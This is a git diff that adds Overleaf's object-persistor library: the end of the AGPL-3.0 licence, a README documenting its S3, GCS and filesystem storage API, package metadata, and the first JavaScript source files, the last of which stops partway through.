"Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. 
+ + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. 
+ + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. 
+ + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. 
You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. + + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. 
If the Program does not specify a version number of the
+GNU Affero General Public License, you may choose any version ever published
+by the Free Software Foundation.
+
+  If the Program specifies that a proxy can decide which future
+versions of the GNU Affero General Public License can be used, that proxy's
+public statement of acceptance of a version permanently authorizes you
+to choose that version for the Program.
+
+  Later license versions may give you additional or different
+permissions.  However, no additional obligations are imposed on any
+author or copyright holder as a result of your choosing to follow a
+later version.
+
+  15. Disclaimer of Warranty.
+
+  THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
+APPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
+HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
+OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
+THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
+IS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
+ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
+
+  16. Limitation of Liability.
+
+  IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
+THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
+GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
+USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
+DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
+PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
+EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
+SUCH DAMAGES.
+
+  17. Interpretation of Sections 15 and 16.
+
+  If the disclaimer of warranty and limitation of liability provided
+above cannot be given local legal effect according to their terms,
+reviewing courts shall apply local law that most closely approximates
+an absolute waiver of all civil liability in connection with the
+Program, unless a warranty or assumption of liability accompanies a
+copy of the Program in return for a fee.
+
+                     END OF TERMS AND CONDITIONS
+
+            How to Apply These Terms to Your New Programs
+
+  If you develop a new program, and you want it to be of the greatest
+possible use to the public, the best way to achieve this is to make it
+free software which everyone can redistribute and change under these terms.
+
+  To do so, attach the following notices to the program.  It is safest
+to attach them to the start of each source file to most effectively
+state the exclusion of warranty; and each file should have at least
+the "copyright" line and a pointer to where the full notice is found.
+
+    <one line to give the program's name and a brief idea of what it does.>
+    Copyright (C) <year>  <name of author>
+
+    This program is free software: you can redistribute it and/or modify
+    it under the terms of the GNU Affero General Public License as published by
+    the Free Software Foundation, either version 3 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU Affero General Public License for more details.
+
+    You should have received a copy of the GNU Affero General Public License
+    along with this program.  If not, see <https://www.gnu.org/licenses/>.
+
+Also add information on how to contact you by electronic and paper mail.
+
+  If your software can interact with users remotely through a computer
+network, you should also make sure that it provides a way for users to
+get its source.  For example, if your program is a web application, its
+interface could display a "Source" link that leads users to an archive
+of the code.  There are many ways you could offer source, and different
+solutions will be better for different programs; see section 13 for the
+specific requirements.
+
+  You should also get your employer (if you work as a programmer) or school,
+if any, to sign a "copyright disclaimer" for the program, if necessary.
+For more information on this, and how to apply and follow the GNU AGPL, see
+<https://www.gnu.org/licenses/>.
diff --git a/libraries/object-persistor/README.md b/libraries/object-persistor/README.md
new file mode 100644
index 0000000..df9d6a3
--- /dev/null
+++ b/libraries/object-persistor/README.md
@@ -0,0 +1,314 @@
+# @overleaf/object-persistor
+
+Stores arbitrary objects in multiple backends, with support for falling back to a secondary backend if the object can't be found in the primary.
+
+Contains a workaround within the GCS backend that allows lifecycle rules to keep objects safe from deletion for a set period of time, which can't currently be accomplished with GCS's own rules (see the configuration-specific notes below).
+
+## Backends available
+
+- S3
+- GCS
+- Filesystem (FS)
+
+## Getting started
+
+```JavaScript
+// import the module
+const ObjectPersistor = require('object-persistor')
+
+const config = {
+  // see 'Configuration' section below
+}
+// create a new persistor
+const Persistor = ObjectPersistor(config)
+```
+
+### Errors
+
+Errors returned by persistor methods are all derived from `OError` (`@overleaf/o-error`). To perform `instanceof` checks, you can use the `Errors` object from the persistor module:
+
+```JavaScript
+const ObjectPersistor = require('object-persistor')
+const { Errors } = ObjectPersistor
+```
+
+### Methods
+
+#### sendStream
+
+```JavaScript
+async function sendStream(bucketName, key, readStream, opts = {})
+```
+
+Uploads a stream to the backend.
+
+- `bucketName`: The name of the bucket to upload to
+- `key`: The key for the uploaded object
+- `readStream`: The data stream to upload
+- `opts` (optional):
+  - `sourceMd5`: The md5 hash of the source data, if known. The uploaded data will be compared against this and the operation will fail if it does not match. If omitted, the md5 is calculated as the data is uploaded instead, and verified against the backend.
+  - `contentType`: The content type to write in the object metadata
+  - `contentEncoding`: The content encoding to write in the object metadata
+
+##### Notes
+
+When using a secondary persistor, this method uploads only to the primary.
+
+If an object already exists at the specified key, it will be overwritten.
+
+#### getObjectStream
+
+```JavaScript
+async function getObjectStream(bucketName, key, opts = {})
+```
+
+Retrieves a stream from the backend for reading.
+
+- `bucketName`: The name of the bucket to download from
+- `key`: The key for the object
+- `opts` (optional):
+  - `start`, `end`: Downloads a byte range from the object. Specify both `start` and `end`; `end` is inclusive.
+
+##### Returns
+
+A `stream.Readable` to read the data.
+
+##### Notes
+
+When using a secondary persistor, this method will fall back to retrieving the object from the secondary if it does not exist on the primary.
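+
+As a rough sketch of how these two methods fit together: `persistor` below is assumed to be the object returned from `ObjectPersistor(config)` as in 'Getting started', and the bucket, key and file names are placeholders.
+
+```JavaScript
+const fs = require('node:fs')
+
+async function uploadAndDownload(persistor) {
+  // upload a local file as a stream; with no sourceMd5 supplied, the
+  // md5 is calculated during upload and verified against the backend
+  await persistor.sendStream(
+    'my-bucket',
+    'some/key',
+    fs.createReadStream('/tmp/example.txt'),
+    { contentType: 'text/plain' }
+  )
+
+  // read back the first kilobyte (`end` is inclusive)
+  const stream = await persistor.getObjectStream('my-bucket', 'some/key', {
+    start: 0,
+    end: 1023,
+  })
+  stream.pipe(process.stdout)
+}
+```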
+
+#### getRedirectUrl
+
+```JavaScript
+async function getRedirectUrl(bucketName, key)
+```
+
+Gets a signed link directly to the backend, if possible. This can be used to download the data directly instead of proxying it.
+
+- `bucketName`: The name of the bucket to download from
+- `key`: The key for the object
+
+##### Returns
+
+A `string` containing the signed link, or `null` if a link cannot be generated.
+
+##### Notes
+
+If `null` is returned, you should fall back to `getObjectStream`, as signed links cannot always be generated.
+
+Do not use this method if you are using a secondary persistor: this mechanism does not check whether the object actually exists, so it cannot provide a fallback.
+
+#### getObjectSize
+
+```JavaScript
+async function getObjectSize(bucketName, key)
+```
+
+Returns the size of the stored data.
+
+- `bucketName`: The name of the bucket to download from
+- `key`: The key for the object
+
+##### Returns
+
+An integer containing the size, in bytes.
+
+##### Notes
+
+When using a secondary persistor, this method returns the size from the secondary persistor if the object is not found on the primary.
+
+#### getObjectMd5Hash
+
+```JavaScript
+async function getObjectMd5Hash(bucketName, key)
+```
+
+Returns the MD5 hash of the stored data.
+
+- `bucketName`: The name of the bucket to download from
+- `key`: The key for the object
+
+##### Returns
+
+A string containing the hex representation of the MD5 hash.
+
+##### Notes
+
+When using a secondary persistor, this method returns the hash from the secondary persistor if the object is not found on the primary.
+
+#### deleteFile
+
+```JavaScript
+async function deleteFile(bucketName, key)
+```
+
+Deletes an object.
+
+- `bucketName`: The name of the bucket to delete from
+- `key`: The key for the object
+
+##### Notes
+
+When using a secondary persistor, this deletes the object from _both_ persistors.
+
+#### deleteDirectory
+
+```JavaScript
+async function deleteDirectory(bucketName, key)
+```
+
+Deletes a directory (all objects whose keys start with the supplied `key`).
+
+- `bucketName`: The name of the bucket to delete from
+- `key`: The key prefix for the objects
+
+##### Notes
+
+When using a secondary persistor, this deletes the objects from _both_ persistors.
+
+#### directorySize
+
+```JavaScript
+async function directorySize(bucketName, key)
+```
+
+Returns the size of a directory (all objects whose keys start with the supplied `key`).
+
+- `bucketName`: The name of the bucket to examine
+- `key`: The key prefix for the objects
+
+##### Returns
+
+An integer containing the size, in bytes.
+
+##### Notes
+
+When using a secondary persistor, this returns the value from the secondary persistor if no objects are found on the primary.
+
+#### checkIfObjectExists
+
+```JavaScript
+async function checkIfObjectExists(bucketName, key)
+```
+
+Returns whether an object exists.
+
+- `bucketName`: The name of the bucket to examine
+- `key`: The key for the object
+
+##### Returns
+
+A boolean representing whether the object exists.
+
+##### Notes
+
+When using a secondary persistor, returns true if the object exists on either the primary or the secondary.
+
+#### copyObject
+
+```JavaScript
+async function copyObject(bucketName, sourceKey, destKey)
+```
+
+Copies an object to another key within the same bucket.
+
+- `bucketName`: The name of the bucket in which to copy the object
+- `sourceKey`: The key for the object to be copied
+- `destKey`: The key to which the object should be copied
+
+##### Notes
+
+Can only copy objects within a single bucket. To copy objects in any other way, pass the stream returned from `getObjectStream` to `sendStream`, as shown below.
+
+If an object already exists at the specified key, it will be overwritten.
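+
+For example, a cross-bucket copy could be sketched as follows (the bucket and key names are placeholders):
+
+```JavaScript
+async function copyAcrossBuckets(persistor) {
+  // download from one bucket and re-upload to another; sendStream
+  // calculates and verifies the md5 of the copied data as it uploads
+  const readStream = await persistor.getObjectStream('source-bucket', 'some/key')
+  await persistor.sendStream('destination-bucket', 'some/key', readStream)
+}
+```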
+
+#### sendFile
+
+```JavaScript
+async function sendFile(bucketName, key, fsPath)
+```
+
+Uploads a file from the local disk.
+
+- `bucketName`: The name of the bucket to upload to
+- `key`: The key for the uploaded object
+- `fsPath`: The path on disk to the file for uploading
+
+##### Notes
+
+When using a secondary persistor, this method uploads only to the primary.
+
+If an object already exists at the specified key, it will be overwritten.
+
+This method is designed for applications that may write temporary data out to the disk before uploading.
+
+## Configuration
+
+An object with the relevant configuration should be passed to the main function returned from the module. The object contains both common and backend-specific parameters; a short example follows the S3 notes below.
+
+### Common parameters
+
+- `backend` (required): String specifying the primary persistor to use as the storage backend. Must be one of `s3`, `gcs` or `fs`.
+- `signedUrlExpiryInMs`: Time before expiry (in milliseconds) of signed URLs
+
+### FS-specific parameters
+
+- `useSubdirectories`: If true, files will be stored in subdirectories on the filesystem. By default, the directory structure is flattened and slashes in the object keys are replaced with underscores.
+
+#### Notes
+
+For the `FS` persistor, the `bucketName` should be the full path to the folder on disk where the files are stored.
+
+### S3-specific parameters
+
+- `s3.key` (required): The AWS access key ID
+- `s3.secret` (required): The AWS secret access key
+- `s3.partSize`: The part size for S3 uploads. Defaults to 100 megabytes.
+- `s3.httpOptions`: HTTP options passed directly to the [S3 constructor](https://docs.aws.amazon.com/AWSJavaScriptSDK/latest/AWS/S3.html#constructor-property).
+- `s3.maxRetries`: The number of times the S3 client will retry in case of an error
+- `s3.endpoint`: For testing - overrides the S3 endpoint to use a different service (e.g. a fake S3 server)
+- `s3.pathStyle`: For testing - use old path-style URLs, for services that do not support subdomain-based access
+
+- `s3BucketCreds`: A JSON-encoded string specifying different S3 credentials for accessing different buckets, in the following format. These credentials override the default ones configured in the main `s3` settings:
+
+```json
+{
+  "bucketName": {
+    "auth_key": "your aws access key ID",
+    "auth_secret": "your aws secret access key"
+  }
+}
+```
+
+#### Notes
+
+In order for server-side MD5 generation to work, uploads must be below the `partSize`. Otherwise a multipart upload will be used, and the S3 `eTag`, which is used to retrieve the MD5, will not be the MD5 hash of the uploaded object. In these cases, we download the data and calculate the MD5 manually.
+
+For verification during upload, we use S3's checksum mechanism to verify the integrity of the uploaded data; but note that explicitly retrieving the MD5 hash will download the entire object if its size is above the part size.
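+
+As a minimal sketch, an S3 configuration might look like this (the credential values are placeholders read from the environment):
+
+```JavaScript
+const ObjectPersistor = require('object-persistor')
+
+// backend selection plus the required S3 credentials from the lists above
+const persistor = ObjectPersistor({
+  backend: 's3',
+  s3: {
+    key: process.env.AWS_ACCESS_KEY_ID,
+    secret: process.env.AWS_SECRET_ACCESS_KEY,
+  },
+})
+```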
+
+### GCS-specific parameters
+
+GCS authentication is configured automatically via the local service account, or the `GOOGLE_APPLICATION_CREDENTIALS` environment variable.
+
+- `gcs.unlockBeforeDelete`: unlock an event-based hold before deleting (default false; see notes)
+- `gcs.deletedBucketSuffix`: if present, copy the object to a bucket with this suffix before deletion (see notes)
+- `gcs.deleteConcurrency`: when recursively deleting a directory, the maximum number of delete requests that will be used at once (default 50)
+- `gcs.unsignedUrls`: For testing - do not sign GCS download URLs
+- `gcs.endpoint.apiEndpoint`: For testing - specify a different GCS endpoint to use
+- `gcs.endpoint.projectId`: For testing - the GCS project ID to supply to the overridden backend
+
+#### Notes
+
+In order to support deletion after a period, the GCS persistor allows usage of a two-bucket system. The main bucket contains the live objects, and on delete the objects are first copied to a 'deleted' bucket, and then deleted from the main one. The 'deleted' bucket is then expected to have a lifecycle policy applied to delete objects after a set period.
+
+In order to prevent accidental deletion from outside this mechanism, an event-based hold can be applied by default on the main bucket. This hold is unlocked _after_ the object has been copied to the 'deleted' bucket, so that the object can then be deleted from the main bucket.
+
+## Contributing
+
+Contributions should pass the lint, formatting and unit test checks. To run these, use
+
+```
+npm run test
+```
+
+There are no acceptance tests in this module, but https://github.com/overleaf/filestore/ contains a comprehensive set of acceptance tests that use this module. These should still pass with your changes applied.
diff --git a/libraries/object-persistor/buildscript.txt b/libraries/object-persistor/buildscript.txt
new file mode 100644
index 0000000..9ca6929
--- /dev/null
+++ b/libraries/object-persistor/buildscript.txt
@@ -0,0 +1,10 @@
+object-persistor
+--dependencies=None
+--docker-repos=gcr.io/overleaf-ops
+--env-add=
+--env-pass-through=
+--esmock-loader=False
+--is-library=True
+--node-version=20.18.2
+--public-repo=False
+--script-version=4.7.0
diff --git a/libraries/object-persistor/index.js b/libraries/object-persistor/index.js
new file mode 100644
index 0000000..d459aaa
--- /dev/null
+++ b/libraries/object-persistor/index.js
@@ -0,0 +1,6 @@
+const PersistorFactory = require('./src/PersistorFactory')
+
+module.exports = function ObjectPersistor(settings) {
+  return PersistorFactory(settings)
+}
+module.exports.Errors = require('./src/Errors')
diff --git a/libraries/object-persistor/package.json b/libraries/object-persistor/package.json
new file mode 100644
index 0000000..2cc70b4
--- /dev/null
+++ b/libraries/object-persistor/package.json
@@ -0,0 +1,45 @@
+{
+  "name": "@overleaf/object-persistor",
+  "version": "1.0.2",
+  "description": "Module for storing objects in multiple backends, with fallback on 404 to assist migration between them",
+  "main": "index.js",
+  "scripts": {
+    "test": "npm run lint && npm run format && npm run types:check && npm run test:unit",
+    "test:unit": "mocha --exit test/**/*.{js,cjs}",
+    "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .",
+    "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .",
+    "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'",
+    "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'",
+    "test:ci": "npm run test:unit",
+    "types:check": "tsc --noEmit"
+  },
+  "repository": {
+    "type": "git",
+    "url": "github.com:overleaf/object-persistor"
+  },
+  "author": "Overleaf (https://www.overleaf.com/)",
+  "license": "AGPL-3.0",
+  "dependencies": {
+    "@google-cloud/storage": "^6.10.1",
+    "@overleaf/logger": "*",
"@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/stream-utils": "*", + "aws-sdk": "^2.1691.0", + "fast-crc32c": "overleaf/node-fast-crc32c#aae6b2a4c7a7a159395df9cc6c38dfde702d6f51", + "glob": "^7.1.6", + "range-parser": "^1.2.1", + "tiny-async-pool": "^1.1.0" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "mock-fs": "^5.2.0", + "mongodb": "6.12.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + } +} diff --git a/libraries/object-persistor/src/AbstractPersistor.js b/libraries/object-persistor/src/AbstractPersistor.js new file mode 100644 index 0000000..3352766 --- /dev/null +++ b/libraries/object-persistor/src/AbstractPersistor.js @@ -0,0 +1,163 @@ +const { NotImplementedError } = require('./Errors') + +module.exports = class AbstractPersistor { + /** + * @param location + * @param target + * @param {string} source + * @return {Promise} + */ + async sendFile(location, target, source) { + throw new NotImplementedError('method not implemented in persistor', { + method: 'sendFile', + location, + target, + source, + }) + } + + /** + * @param location + * @param target + * @param {NodeJS.ReadableStream} sourceStream + * @param {Object} opts + * @return {Promise} + */ + async sendStream(location, target, sourceStream, opts = {}) { + throw new NotImplementedError('method not implemented in persistor', { + method: 'sendStream', + location, + target, + opts, + }) + } + + /** + * @param location + * @param name + * @param {Object} [opts] + * @param {Number} [opts.start] + * @param {Number} [opts.end] + * @return {Promise} + */ + async getObjectStream(location, name, opts = {}) { + throw new NotImplementedError('method not implemented in persistor', { + method: 'getObjectStream', + location, + name, + opts, + }) + } + + /** + * @param {string} location + * @param {string} name + * @return {Promise} + */ + async getRedirectUrl(location, name) { + throw new NotImplementedError('method not implemented in persistor', { + method: 'getRedirectUrl', + location, + name, + }) + } + + /** + * @param {string} location + * @param {string} name + * @param {Object} opts + * @return {Promise} + */ + async getObjectSize(location, name, opts) { + throw new NotImplementedError('method not implemented in persistor', { + method: 'getObjectSize', + location, + name, + }) + } + + /** + * @param {string} location + * @param {string} name + * @param {Object} opts + * @return {Promise} + */ + async getObjectMd5Hash(location, name, opts) { + throw new NotImplementedError('method not implemented in persistor', { + method: 'getObjectMd5Hash', + location, + name, + }) + } + + /** + * @param {string} location + * @param {string} fromName + * @param {string} toName + * @param {Object} opts + * @return {Promise} + */ + async copyObject(location, fromName, toName, opts) { + throw new NotImplementedError('method not implemented in persistor', { + method: 'copyObject', + location, + fromName, + toName, + }) + } + + /** + * @param {string} location + * @param {string} name + * @return {Promise} + */ + async deleteObject(location, name) { + throw new NotImplementedError('method not implemented in persistor', { + method: 'deleteObject', + location, + name, + }) + } + + /** + * @param {string} location + * @param {string} name + * @param {string} [continuationToken] + * @return {Promise} + */ + async deleteDirectory(location, name, continuationToken) { + throw new NotImplementedError('method not implemented 
in persistor', { + method: 'deleteDirectory', + location, + name, + }) + } + + /** + * @param {string} location + * @param {string} name + * @param {Object} opts + * @return {Promise} + */ + async checkIfObjectExists(location, name, opts) { + throw new NotImplementedError('method not implemented in persistor', { + method: 'checkIfObjectExists', + location, + name, + }) + } + + /** + * @param {string} location + * @param {string} name + * @param {string} [continuationToken] + * @return {Promise} + */ + async directorySize(location, name, continuationToken) { + throw new NotImplementedError('method not implemented in persistor', { + method: 'directorySize', + location, + name, + }) + } +} diff --git a/libraries/object-persistor/src/Errors.js b/libraries/object-persistor/src/Errors.js new file mode 100644 index 0000000..0c9dd52 --- /dev/null +++ b/libraries/object-persistor/src/Errors.js @@ -0,0 +1,19 @@ +const OError = require('@overleaf/o-error') + +class NotFoundError extends OError {} +class WriteError extends OError {} +class ReadError extends OError {} +class SettingsError extends OError {} +class NotImplementedError extends OError {} +class AlreadyWrittenError extends OError {} +class NoKEKMatchedError extends OError {} + +module.exports = { + NotFoundError, + WriteError, + ReadError, + SettingsError, + NotImplementedError, + AlreadyWrittenError, + NoKEKMatchedError, +} diff --git a/libraries/object-persistor/src/FSPersistor.js b/libraries/object-persistor/src/FSPersistor.js new file mode 100644 index 0000000..01aab72 --- /dev/null +++ b/libraries/object-persistor/src/FSPersistor.js @@ -0,0 +1,330 @@ +const crypto = require('node:crypto') +const fs = require('node:fs') +const fsPromises = require('node:fs/promises') +const globCallbacks = require('glob') +const Path = require('node:path') +const { PassThrough } = require('node:stream') +const { pipeline } = require('node:stream/promises') +const { promisify } = require('node:util') + +const AbstractPersistor = require('./AbstractPersistor') +const { ReadError, WriteError, NotImplementedError } = require('./Errors') +const PersistorHelper = require('./PersistorHelper') + +const glob = promisify(globCallbacks) + +module.exports = class FSPersistor extends AbstractPersistor { + constructor(settings = {}) { + if (settings.storageClass) { + throw new NotImplementedError( + 'FS backend does not support storage classes' + ) + } + + super() + this.useSubdirectories = Boolean(settings.useSubdirectories) + } + + async sendFile(location, target, source) { + // actually copy the file (instead of moving it) to maintain consistent behaviour + // between the different implementations + try { + const sourceStream = fs.createReadStream(source) + await this.sendStream(location, target, sourceStream) + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to copy the specified file', + { location, target, source }, + WriteError + ) + } + } + + async sendStream(location, target, sourceStream, opts = {}) { + if (opts.ifNoneMatch === '*') { + // The standard library only has fs.rename(), which does not support exclusive flags. + // Refuse to act on this write operation. + throw new NotImplementedError( + 'Overwrite protection required by caller, but it is not available is FS backend. Configure GCS or S3 backend instead, get in touch with support for further information.' 
